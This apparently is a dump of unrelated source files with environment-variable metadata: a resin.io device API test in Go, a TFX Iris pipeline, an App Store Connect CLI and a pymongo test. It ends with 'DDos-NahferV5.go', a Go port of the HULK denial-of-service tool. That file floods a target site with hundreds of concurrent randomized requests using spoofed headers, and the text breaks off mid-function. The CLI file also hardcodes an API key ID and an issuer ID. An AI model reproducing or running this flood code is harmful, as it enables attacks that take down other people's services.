["TF_CPP_MIN_LOG_LEVEL\""]
|
python
| 1 | 0 | |
device_test.go
|
package resingo
import (
"net/http"
"os"
"testing"
"time"
)
func TestDevice(t *testing.T) {
config := &Config{
Username: ENV.Username,
Password: ENV.Password,
ResinEndpoint: apiEndpoint,
}
client := &http.Client{}
ctx := &Context{
Client: client,
Config: config,
}
err := Login(ctx, Credentials)
if err != nil {
t.Fatal(err)
}
appName := "device_test"
app, err := AppCreate(ctx, appName, RaspberryPi3)
if err != nil {
t.Fatal(err)
}
defer func() {
_, _ = AppDelete(ctx, app.ID)
}()
maxDevices := 4
devices := make([]struct {
uuid string
dev *Device
}, maxDevices)
for i := 0; i < maxDevices; i++ {
uid, err := GenerateUUID()
if err != nil {
t.Fatal(err)
}
devices[i].uuid = uid
}
t.Run("Register", func(ts *testing.T) {
for _, d := range devices {
testDevRegister(ctx, ts, appName, d.uuid)
}
})
t.Run("GetByUUID", func(ts *testing.T) {
for i, d := range devices {
devices[i].dev = testDevGetByUUID(ctx, ts, d.uuid)
}
})
t.Run("GetByName", func(ts *testing.T) {
for _, d := range devices {
testDevGetByName(ctx, ts, d.dev.Name)
}
})
t.Run("GetAllByApp", func(ts *testing.T) {
testDevGetAllByApp(ctx, ts, app.ID, maxDevices)
})
t.Run("GetAll", func(ts *testing.T) {
testDevGetAll(ctx, ts, appName, maxDevices)
})
t.Run("Rename", func(ts *testing.T) {
testDevRename(ctx, ts, "avocado", devices[0].uuid)
})
t.Run("GetApp", func(ts *testing.T) {
testDevGetApp(ctx, ts, devices[0].uuid, appName)
})
t.Run("EnableURL", func(ts *testing.T) {
uuid := os.Getenv("RESINTEST_REALDEVICE_UUID")
if uuid == "" {
ts.Skip("missing RESINTEST_REALDEVICE_UUID")
}
testDevEnableURL(ctx, ts, devices[0].uuid)
})
t.Run("DisableURL", func(ts *testing.T) {
uuid := os.Getenv("RESINTEST_REALDEVICE_UUID")
if uuid == "" {
ts.Skip("missing RESINTEST_REALDEVICE_UUID")
}
testDevDisableURL(ctx, ts, devices[0].uuid)
})
t.Run("Delete", func(ts *testing.T) {
u, _ := GenerateUUID()
d, err := DevRegister(ctx, appName, u)
if err != nil {
ts.Fatal(err)
}
err = DevDelete(ctx, d.ID)
if err != nil {
ts.Fatal(err)
}
_, err = DevGetByUUID(ctx, u)
if err != ErrDeviceNotFound {
ts.Errorf("expected %s got %s", ErrDeviceNotFound.Error(), err.Error())
}
})
t.Run("Note", func(ts *testing.T) {
note := "hello,world"
err := DevNote(ctx, devices[0].dev.ID, note)
if err != nil {
ts.Fatal(err)
}
})
env := []struct {
key, value string
}{
{"Mad", "Scientist"},
{"MONIKER", "IOT"},
}
t.Run("CreateEnv", func(ts *testing.T) {
for _, v := range devices {
for _, e := range env {
en, err := EnvDevCreate(ctx, v.dev.ID, e.key, e.value)
if err != nil {
ts.Error(err)
}
if en.Name != e.key {
ts.Errorf("expected %s got %s", e.key, en.Name)
}
}
}
})
t.Run("EnvGetAll", func(ts *testing.T) {
for _, v := range devices {
envs, err := EnvDevGetAll(ctx, v.dev.ID)
if err != nil {
ts.Error(err)
}
if len(envs) != len(env) {
ts.Errorf("expected %d got %d", len(env), len(envs))
}
}
})
t.Run("EnvUpdate", func(ts *testing.T) {
envs, err := EnvDevGetAll(ctx, devices[0].dev.ID)
if err != nil {
ts.Fatal(err)
}
for _, e := range envs {
err := EnvDevUpdate(ctx, e.ID, e.Name)
if err != nil {
ts.Error(err)
}
}
})
t.Run("EnvDelete", func(ts *testing.T) {
envs, err := EnvDevGetAll(ctx, devices[0].dev.ID)
if err != nil {
ts.Fatal(err)
}
for _, e := range envs {
err := EnvDevDelete(ctx, e.ID)
if err != nil {
ts.Error(err)
}
}
})
}
func testDevGetAll(ctx *Context, t *testing.T, appName string, expect int) {
dev, err := DevGetAll(ctx)
if err != nil {
t.Fatal(err)
}
if len(dev) < expect {
t.Errorf("expected %d devices got %d ", expect, len(dev))
}
}
func testDevRegister(ctx *Context, t *testing.T, appname, uuid string) {
dev, err := DevRegister(ctx, appname, uuid)
if err != nil {
t.Error(err)
}
if dev != nil {
if dev.UUID != uuid {
t.Error("device uuid mismatch")
}
}
}
func testDevGetByUUID(ctx *Context, t *testing.T, uuid string) *Device {
dev, err := DevGetByUUID(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if dev.UUID != uuid {
t.Fatalf("expected %s got %s", uuid, dev.UUID)
}
return dev
}
func testDevGetByName(ctx *Context, t *testing.T, name string) {
dev, err := DevGetByName(ctx, name)
if err != nil {
t.Fatal(err)
}
if dev.Name != name {
t.Errorf("expected %s got %s", name, dev.Name)
}
}
func testDevGetAllByApp(ctx *Context, t *testing.T, appID int64, expect int) {
dev, err := DevGetAllByApp(ctx, appID)
if err != nil {
t.Fatal(err)
}
if len(dev) != expect {
t.Errorf("expected %d devies got %d", expect, len(dev))
}
}
func testDevRename(ctx *Context, t *testing.T, newName string, uuid string) {
err := DevRename(ctx, uuid, newName)
if err != nil {
t.Fatal(err)
}
dev, err := DevGetByUUID(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if dev.Name != newName {
t.Errorf("expected %s got %s", newName, dev.Name)
}
}
func testDevGetApp(ctx *Context, t *testing.T, uuid, appName string) {
app, err := DevGetApp(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if app.Name != appName {
t.Errorf("expected %s got %s", appName, app.Name)
}
}
func testDevEnableURL(ctx *Context, t *testing.T, uuid string) {
err := DevEnableURL(ctx, uuid)
if err != nil {
t.Fatal(err)
}
dev, err := DevGetByUUID(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if !dev.WebAccessible {
t.Error("the device should be web accessible")
}
}
func testDevDisableURL(ctx *Context, t *testing.T, uuid string) {
err := DevDisableURL(ctx, uuid)
if err != nil {
t.Fatal(err)
}
dev, err := DevGetByUUID(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if dev.WebAccessible {
t.Error("the device should not be web accessible")
}
}
func TestDump(t *testing.T) {
config := &Config{
Username: ENV.Username,
Password: ENV.Password,
ResinEndpoint: apiEndpoint,
}
client := &http.Client{}
ctx := &Context{
Client: client,
Config: config,
}
err := Login(ctx, Credentials)
if err != nil {
t.Fatal(err)
}
//d, _ := DevGetByUUID(ctx, "b594dafa5fd01be0a029a44e64e657d58c0f4d31652c956712b687e3f331a6")
//fmt.Println(d.LogsChannel)
uuid := "b594dafa5fd01be0a029a44e64e657d58c0f4d31652c956712b687e3f331a6"
lg, err := NewLogs(ctx)
if err != nil {
t.Fatal(err)
}
go func() {
err = lg.Log(uuid, os.Stdout)
if err != nil {
t.Fatal(err)
}
}()
time.Sleep(30 * time.Second)
lg.Close()
}
|
[
"\"RESINTEST_REALDEVICE_UUID\"",
"\"RESINTEST_REALDEVICE_UUID\""
] |
[] |
[
"RESINTEST_REALDEVICE_UUID"
] |
[]
|
["RESINTEST_REALDEVICE_UUID"]
|
go
| 1 | 0 | |
tfx/examples/iris/iris_pipeline_native_keras.py
|
# Lint as: python2, python3
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Iris flowers example using TFX."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from typing import Text
import absl
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen
from tfx.components import Evaluator
from tfx.components import ExampleValidator
from tfx.components import Pusher
from tfx.components import ResolverNode
from tfx.components import SchemaGen
from tfx.components import StatisticsGen
from tfx.components import Trainer
from tfx.components import Transform
from tfx.components.base import executor_spec
from tfx.components.trainer.executor import GenericExecutor
from tfx.dsl.experimental import latest_blessed_model_resolver
from tfx.orchestration import metadata
from tfx.orchestration import pipeline
from tfx.orchestration.beam.beam_dag_runner import BeamDagRunner
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.types import Channel
from tfx.types.standard_artifacts import Model
from tfx.types.standard_artifacts import ModelBlessing
from tfx.utils.dsl_utils import external_input
_pipeline_name = 'iris_native_keras'
# This example assumes that Iris flowers data is stored in ~/iris/data and the
# utility function is in ~/iris. Feel free to customize as needed.
_iris_root = os.path.join(os.environ['HOME'], 'iris')
_data_root = os.path.join(_iris_root, 'data')
# Python module file to inject customized logic into the TFX components. The
# Transform and Trainer both require user-defined functions to run successfully.
_module_file = os.path.join(_iris_root, 'iris_utils_native_keras.py')
# Path which can be listened to by the model server. Pusher will output the
# trained model here.
_serving_model_dir = os.path.join(_iris_root, 'serving_model', _pipeline_name)
# Directory and data locations. This example assumes all of the flowers
# example code and metadata library is relative to $HOME, but you can store
# these files anywhere on your local filesystem.
_tfx_root = os.path.join(os.environ['HOME'], 'tfx')
_pipeline_root = os.path.join(_tfx_root, 'pipelines', _pipeline_name)
# Sqlite ML-metadata db path.
_metadata_path = os.path.join(_tfx_root, 'metadata', _pipeline_name,
'metadata.db')
def _create_pipeline(pipeline_name: Text, pipeline_root: Text, data_root: Text,
module_file: Text, serving_model_dir: Text,
metadata_path: Text,
direct_num_workers: int) -> pipeline.Pipeline:
"""Implements the Iris flowers pipeline with TFX."""
examples = external_input(data_root)
# Brings data into the pipeline or otherwise joins/converts training data.
example_gen = CsvExampleGen(input=examples)
# Computes statistics over data for visualization and example validation.
statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
# Generates schema based on statistics files.
schema_gen = SchemaGen(
statistics=statistics_gen.outputs['statistics'], infer_feature_shape=True)
# Performs anomaly detection based on statistics and data schema.
example_validator = ExampleValidator(
statistics=statistics_gen.outputs['statistics'],
schema=schema_gen.outputs['schema'])
# Performs transformations and feature engineering in training and serving.
transform = Transform(
examples=example_gen.outputs['examples'],
schema=schema_gen.outputs['schema'],
module_file=module_file)
# Uses user-provided Python function that trains a model using TF-Learn.
trainer = Trainer(
module_file=module_file,
custom_executor_spec=executor_spec.ExecutorClassSpec(GenericExecutor),
examples=transform.outputs['transformed_examples'],
transform_graph=transform.outputs['transform_graph'],
schema=schema_gen.outputs['schema'],
train_args=trainer_pb2.TrainArgs(num_steps=2000),
eval_args=trainer_pb2.EvalArgs(num_steps=5))
# Get the latest blessed model for model validation.
model_resolver = ResolverNode(
instance_name='latest_blessed_model_resolver',
resolver_class=latest_blessed_model_resolver.LatestBlessedModelResolver,
model=Channel(type=Model),
model_blessing=Channel(type=ModelBlessing))
# Uses TFMA to compute an evaluation statistics over features of a model and
# perform quality validation of a candidate model (compared to a baseline).
eval_config = tfma.EvalConfig(
model_specs=[tfma.ModelSpec(label_key='variety')],
slicing_specs=[tfma.SlicingSpec()],
metrics_specs=[
tfma.MetricsSpec(
thresholds={
'sparse_categorical_accuracy':
tfma.config.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={'value': 0.6}),
change_threshold=tfma.GenericChangeThreshold(
direction=tfma.MetricDirection.HIGHER_IS_BETTER,
absolute={'value': -1e-10}))
})
])
evaluator = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
baseline_model=model_resolver.outputs['model'],
# Change threshold will be ignored if there is no baseline (first run).
eval_config=eval_config)
# Checks whether the model passed the validation steps and pushes the model
# to a file destination if check passed.
pusher = Pusher(
model=trainer.outputs['model'],
model_blessing=evaluator.outputs['blessing'],
push_destination=pusher_pb2.PushDestination(
filesystem=pusher_pb2.PushDestination.Filesystem(
base_directory=serving_model_dir)))
return pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=[
example_gen,
statistics_gen,
schema_gen,
example_validator,
transform,
trainer,
model_resolver,
evaluator,
pusher,
],
enable_cache=True,
metadata_connection_config=metadata.sqlite_metadata_connection_config(
metadata_path),
# TODO(b/142684737): The multi-processing API might change.
beam_pipeline_args=['--direct_num_workers=%d' % direct_num_workers],
)
# To run this pipeline from the python CLI:
# $python iris_pipeline_native_keras.py
if __name__ == '__main__':
absl.logging.set_verbosity(absl.logging.INFO)
BeamDagRunner().run(
_create_pipeline(
pipeline_name=_pipeline_name,
pipeline_root=_pipeline_root,
data_root=_data_root,
module_file=_module_file,
serving_model_dir=_serving_model_dir,
metadata_path=_metadata_path,
# 0 means auto-detect based on the number of CPUs available during
# execution time.
direct_num_workers=0))
|
[] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
python
| 1 | 0 | |
connect_apk/main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'yuyuan yue'
import sys,os,json
from common import connectool
from connectapi import ConnectApi
import click
@click.group()
@click.option('-k','--apikey','apikey',metavar='',help='app store connect api key',required=True)
@click.option('-i','--issuer','issuer_id',metavar='',help='app store connect issuer id',required=True)
@click.option('-p','--privatekey_path','privatekey_path',type=click.Path(exists=True),metavar='',help='privatekey file path , default linux user root path ".private_keys"')
@click.pass_context
def cli(ctx, apikey, issuer_id,privatekey_path):
'''
app store connect api cli with python use apikey private_key and issuer_id to authorize
how to get apikey,private_key and issuer_id ? https://developer.apple.com/documentation/appstoreconnectapi
'''
if privatekey_path:
if apikey in privatekey_path:
ctx.obj = ConnectApi(apikey,issuer_id,privatekey_path)
else:
connectool.raiseError('private key path error apikey '+apikey+' not in '+privatekey_path)
else:
ctx.obj = ConnectApi(apikey,issuer_id,privatekey_path)
@click.command()
@click.option('-n','--name','name',metavar='',help='device name',required=True)
@click.option('-u','--udid','udid',metavar='',help='device udid',required=True)
@click.pass_obj
def registerdevice(api,name,udid):
'''register device into app store connect with name and udid '''
result = api.register_device(name,udid)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-l','--limit','limit',default=100,metavar='', help='the devices count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the devices sort,default id')
@click.pass_obj
def devices(api,limit,sort):
'''list devices with limit and sort '''
result = api.list_devices(limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-c','--csr_path','csr_path',type=click.Path(exists=True),metavar='',help='certificare csr request file path,must value',required=True)
@click.option('-o','--out','out_path',type=click.Path(exists=True),default=lambda: os.environ.get('HOME', ''),metavar='',help='certificate file out path , default user root path')
@click.option('-t','--type','type',type=click.Choice(['IOS_DEVELOPMENT','IOS_DISTRIBUTION']),default='IOS_DEVELOPMENT',metavar='',help='the certificate type,choice:[IOS_DEVELOPMENT,IOS_DISTRIBUTION] default IOS_DEVELOPMENT')
@click.pass_obj
def registercertificate(api,csr_path,out_path,type):
'''register certificate with csr_path,out_path and type'''
result = api.register_certificate(csr_path=csr_path,out_path=out_path,type=type)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the certificate id',required=True)
@click.pass_obj
def deletecertificate(api,id):
'''delete certificate with id '''
result = api.delete_certificate(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-l','--limit','limit',default=100,metavar='', help='the certificates count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the certificates sort,default id')
@click.pass_obj
def certificates(api,limit,sort):
'''list certificate with limit and sort '''
result = api.list_certificates(limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-b','--bundleid','bundleid',metavar='',help='bundle id',required=True)
@click.option('-t','--teamid','teamid',metavar='',help='team id',required=True)
@click.option('-n','--name','name',metavar='',help='bunle id name',required=True)
@click.pass_obj
def registerbundleid(api,bundleid,teamid,name):
'''register bundle id into app store connect with bundle_id team_id and name '''
result = api.register_bundle_id(bundleid,teamid,name)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-l','--limit','limit',default=100,metavar='', help='the bundleid count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the bundleid sort,default id')
@click.pass_obj
def bundleids(api,limit,sort):
'''list bundleids with limit and sort '''
result = api.list_bundle_ids(limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the bundleid id',required=True)
@click.pass_obj
def deletebundleid(api,id):
'''delete bundleid with id '''
result = api.delete_bundle_id(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the bundleid id',required=True)
@click.pass_obj
def getbundleid(api,id):
'''get bundleid with id '''
result = api.get_bundle_id(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the bundleid id',required=True)
@click.pass_obj
def getbundleidprofiles(api,id):
'''get bundleid profiles with id '''
result = api.get_bundle_id_profiles(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-n','--name','name',metavar='',help='profile name',required=True)
@click.option('-b','--bundleid','bundleid',metavar='',help='profile contact bundleid id',required=True)
@click.option('-c','--certificate','certificate',metavar='',help='profile contact certificate id',required=True)
@click.option('-o','--out','out_path',type=click.Path(exists=True),default=lambda: os.environ.get('HOME', ''),metavar='',help='profile file out path , default user root path')
@click.option('-t','--type','type',type=click.Choice(['IOS_APP_DEVELOPMENT','IOS_APP_STORE','IOS_APP_ADHOC']),default='IOS_DEVELOPMENT',metavar='',help='the certificate type,choice:[IOS_APP_DEVELOPMENT, IOS_APP_STORE, IOS_APP_ADHOC] default IOS_APP_ADHOC')
@click.pass_obj
def createprofile(api,name,bundleid,certificateid,out_path,type):
'''create profile with name,bundleid,certificateid,out_path and type'''
result = api.create_profile(name=name,bundle_id=bundleid,certificate_id=certificateid,out_path=out_path,type=type)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the profile id',required=True)
@click.pass_obj
def deleteprofile(api,id):
'''delete profile with id '''
result = api.delete_profile(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-l','--limit','limit',default=100,metavar='', help='the profiles count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the profiles sort,default id')
@click.pass_obj
def profiles(api,limit,sort):
'''list profiles with limit and sort '''
result = api.list_profiles(limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the profile id',required=True)
@click.pass_obj
def requestprofile(api,id):
'''request profile with id '''
result = api.request_profile(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-o','--out','outpath',type=click.Path(exists=True),default=lambda: os.environ.get('HOME', ''),metavar='',help='file out path , default user root path')
@click.option('-l','--limit','limit',default=100,metavar='', help='the certificates count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the certificates sort,default id')
@click.pass_obj
def downloadcerts(api,outpath,limit,sort):
'''download certificate with limit and sort '''
result = api.download_certificates(outpath,limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-o','--out','outpath',type=click.Path(exists=True),default=lambda: os.environ.get('HOME', ''),metavar='',help='file out path , default user root path')
@click.option('-l','--limit','limit',default=100,metavar='', help='the profiles count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the profiles sort,default id')
@click.pass_obj
def downloadprofiles(api,outpath,limit,sort):
'''download profile with limit and sort '''
result = api.download_profiles(outpath,limit,sort)
click.echo(json.dumps(result))
return result
cli.add_command(registerdevice)
cli.add_command(devices)
cli.add_command(registercertificate)
cli.add_command(deletecertificate)
cli.add_command(certificates)
cli.add_command(downloadcerts)
cli.add_command(registerbundleid)
cli.add_command(bundleids)
cli.add_command(deletebundleid)
cli.add_command(getbundleid)
cli.add_command(getbundleidprofiles)
cli.add_command(createprofile)
cli.add_command(deleteprofile)
cli.add_command(profiles)
cli.add_command(requestprofile)
cli.add_command(downloadprofiles)
if __name__ == '__main__':
cli()
api = ConnectApi('T5VR6D3TZY','5127e6a3-99ef-458f-9ea3-ba6b76e9cc13')
devices = api.list_devices(limit=1)
print(devices)
result = api.register_device('test','test')
print(result)
result = api.register_certificate(csr_path='/Users/last/Desktop/CertificateSigningRequest.certSigningRequest')
print(result)
result = api.delete_certificate('N9P79WJTHK')
print(result)
result = api.list_certificates()
print(result)
result = api.register_bundle_id(bundle_id='com.hepburn.app',team_id='6DD349HLLU',name='hepburn')
print(result)
result = api.list_bundle_ids()
print(result)
result = api.get_bundle_id('N49MX9AWAX')
print(result)
result = api.get_bundle_id_profiles('N49MX9AWAX')
print(result)
result = api.delete_bundle_id('N49MX9AWAX')
print(result)
result = api.create_profile(name='adhoc1',bundle_id='VSLGJ82UHW',certificate_id='T553J666XW',type='IOS_APP_DEVELOPMENT')
print(result)
result = api.delete_profile('4KVXW4LK52')
print(result)
result = api.list_profiles()
print(result)
result = api.request_profile('4KVXW4LK52')
print(result)
|
[] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
python
| 1 | 0 | |
test/test_paired.py
|
# Copyright 2009-2010 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test pairing support.
These tests are skipped by nose by default (since they depend on having a
paired setup. To run the tests just run this file manually.
Left and right nodes will be $DB_IP:$DB_PORT and $DB_IP2:$DB_PORT2 or
localhost:27017 and localhost:27018 by default.
"""
import unittest
import logging
import os
import sys
import warnings
sys.path[0:0] = [""]
from pymongo.errors import ConnectionFailure
from pymongo.connection import Connection
skip_tests = True
class TestPaired(unittest.TestCase):
def setUp(self):
left_host = os.environ.get("DB_IP", "localhost")
left_port = int(os.environ.get("DB_PORT", 27017))
self.left = (left_host, left_port)
right_host = os.environ.get("DB_IP2", "localhost")
right_port = int(os.environ.get("DB_PORT2", 27018))
self.right = (right_host, right_port)
self.bad = ("somedomainthatdoesntexist.org", 12345)
def tearDown(self):
pass
def skip(self):
if skip_tests:
from nose.plugins.skip import SkipTest
raise SkipTest()
def test_types(self):
self.skip()
self.assertRaises(TypeError, Connection.paired, 5)
self.assertRaises(TypeError, Connection.paired, "localhost")
self.assertRaises(TypeError, Connection.paired, None)
self.assertRaises(TypeError, Connection.paired, 5, self.right)
self.assertRaises(TypeError, Connection.paired,
"localhost", self.right)
self.assertRaises(TypeError, Connection.paired, None, self.right)
self.assertRaises(TypeError, Connection.paired, self.left, 5)
self.assertRaises(TypeError, Connection.paired, self.left, "localhost")
self.assertRaises(TypeError, Connection.paired, self.left, "localhost")
def test_connect(self):
self.skip()
self.assertRaises(ConnectionFailure, Connection.paired,
self.bad, self.bad)
connection = Connection.paired(self.left, self.right)
self.assert_(connection)
host = connection.host
port = connection.port
connection = Connection.paired(self.right, self.left)
self.assert_(connection)
self.assertEqual(host, connection.host)
self.assertEqual(port, connection.port)
slave = self.left == (host, port) and self.right or self.left
self.assertRaises(ConnectionFailure, Connection.paired,
slave, self.bad)
self.assertRaises(ConnectionFailure, Connection.paired,
self.bad, slave)
def test_repr(self):
self.skip()
connection = Connection.paired(self.left, self.right)
self.assertEqual(repr(connection),
"Connection(['%s:%s', '%s:%s'])" %
(self.left[0],
self.left[1],
self.right[0],
self.right[1]))
def test_basic(self):
self.skip()
connection = Connection.paired(self.left, self.right)
db = connection.pymongo_test
db.drop_collection("test")
a = {"x": 1}
db.test.save(a)
self.assertEqual(a, db.test.find_one())
def test_end_request(self):
self.skip()
connection = Connection.paired(self.left, self.right)
db = connection.pymongo_test
for _ in range(100):
db.test.remove({})
db.test.insert({})
self.assert_(db.test.find_one())
connection.end_request()
def test_deprecation_warnings_paired_connections(self):
warnings.simplefilter("error")
try:
self.assertRaises(DeprecationWarning, Connection.paired,
self.left, self.right, timeout=3)
self.assertRaises(DeprecationWarning, Connection.paired,
self.left, self.right, auto_start_request=True)
self.assertRaises(DeprecationWarning, Connection.paired,
self.left, self.right, pool_size=20)
finally:
warnings.resetwarnings()
warnings.simplefilter('ignore')
def test_paired_connections_pass_individual_connargs(self):
c = Connection.paired(self.left, self.right, network_timeout=5)
self.assertEqual(5, c._Connection__net_timeout)
if __name__ == "__main__":
skip_tests = False
unittest.main()
|
[] |
[] |
[
"DB_PORT",
"DB_PORT2",
"DB_IP2",
"DB_IP"
] |
[]
|
["DB_PORT", "DB_PORT2", "DB_IP2", "DB_IP"]
|
python
| 4 | 0 | |
DDos-NahferV5.go
|
package main
/*
HULK DoS tool on <strike>steroids</strike> goroutines. Just ported from Python with some improvements.
Original Python utility by Barry Shteiman http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/
This go program licensed under GPLv3.
Copyright Alexander I.Grafov <[email protected]>
*/
import (
"flag"
"fmt"
"io/ioutil"
"math/rand"
"net/http"
"net/url"
"os"
"os/signal"
"strconv"
"strings"
"sync/atomic"
"syscall"
)
const __version__ = "1.0.1"
// const acceptCharset = "windows-1251,utf-8;q=0.7,*;q=0.7" // use it for runet
const acceptCharset = "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
const (
callGotOk uint8 = iota
callExitOnErr
callExitOnTooManyFiles
targetComplete
)
// global params
var (
safe bool = false
headersReferers []string = []string{
"http://www.google.com/?q=",
"http://www.usatoday.com/search/results?q=",
"http://engadget.search.aol.com/search?q=",
//"http://www.google.ru/?hl=ru&q=",
//"http://yandex.ru/yandsearch?text=",
}
headersUseragents []string = []string{
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Vivaldi/1.3.501.6",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
}
cur int32
)
type arrayFlags []string
func (i *arrayFlags) String() string {
return "[" + strings.Join(*i, ",") + "]"
}
func (i *arrayFlags) Set(value string) error {
*i = append(*i, value)
return nil
}
func main() {
var (
version bool
site string
agents string
data string
headers arrayFlags
)
flag.BoolVar(&version, "version", false, "print version and exit")
flag.BoolVar(&safe, "safe", false, "Autoshut after dos.")
flag.StringVar(&site, "site", "http://localhost", "Destination site.")
flag.StringVar(&agents, "agents", "", "Get the list of user-agent lines from a file. By default the predefined list of useragents used.")
flag.StringVar(&data, "data", "", "Data to POST. If present hulk will use POST requests instead of GET")
flag.Var(&headers, "header", "Add headers to the request. Could be used multiple times")
flag.Parse()
t := os.Getenv("DDos-NahferV5")
maxproc, err := strconv.Atoi(t)
if err != nil {
maxproc = 1023
}
u, err := url.Parse(site)
if err != nil {
fmt.Println("err parsing url parameter\n")
os.Exit(1)
}
if version {
fmt.Println("DDos-NahferV5", __version__)
os.Exit(0)
}
if agents != "" {
if data, err := ioutil.ReadFile(agents); err == nil {
headersUseragents = []string{}
for _, a := range strings.Split(string(data), "\n") {
if strings.TrimSpace(a) == "" {
continue
}
headersUseragents = append(headersUseragents, a)
}
} else {
fmt.Printf("can'l load User-Agent list from %s\n", agents)
os.Exit(1)
}
}
go func() {
fmt.Println("->EMPEZANDO ATACAR <-\n Go!\n\n")
ss := make(chan uint8, 8)
var (
err, sent int32
)
fmt.Println("In use |\tResp OK |\tGot err")
for {
if atomic.LoadInt32(&cur) < int32(maxproc-1) {
go httpcall(site, u.Host, data, headers, ss)
}
if sent%10 == 0 {
fmt.Printf("\r%6d of max %-6d |\t%7d |\t%6d", cur, maxproc, sent, err)
}
switch <-ss {
case callExitOnErr:
atomic.AddInt32(&cur, -1)
err++
case callExitOnTooManyFiles:
atomic.AddInt32(&cur, -1)
maxproc--
case callGotOk:
sent++
case targetComplete:
sent++
fmt.Printf("\r%-6d of max %-6d |\t%7d |\t%6d", cur, maxproc, sent, err)
fmt.Println("\r->ATAQUE FINALIZADO<- \n\n\r")
os.Exit(0)
}
}
}()
ctlc := make(chan os.Signal)
signal.Notify(ctlc, syscall.SIGINT, syscall.SIGKILL, syscall.SIGTERM)
<-ctlc
fmt.Println("\r\n-- Interrupted by user -- \n")
}
func httpcall(url string, host string, data string, headers arrayFlags, s chan uint8) {
atomic.AddInt32(&cur, 1)
var param_joiner string
var client = new(http.Client)
if strings.ContainsRune(url, '?') {
param_joiner = "&"
} else {
param_joiner = "?"
}
for {
var q *http.Request
var err error
if data == "" {
q, err = http.NewRequest("GET", url+param_joiner+buildblock(rand.Intn(7)+3)+"="+buildblock(rand.Intn(7)+3), nil)
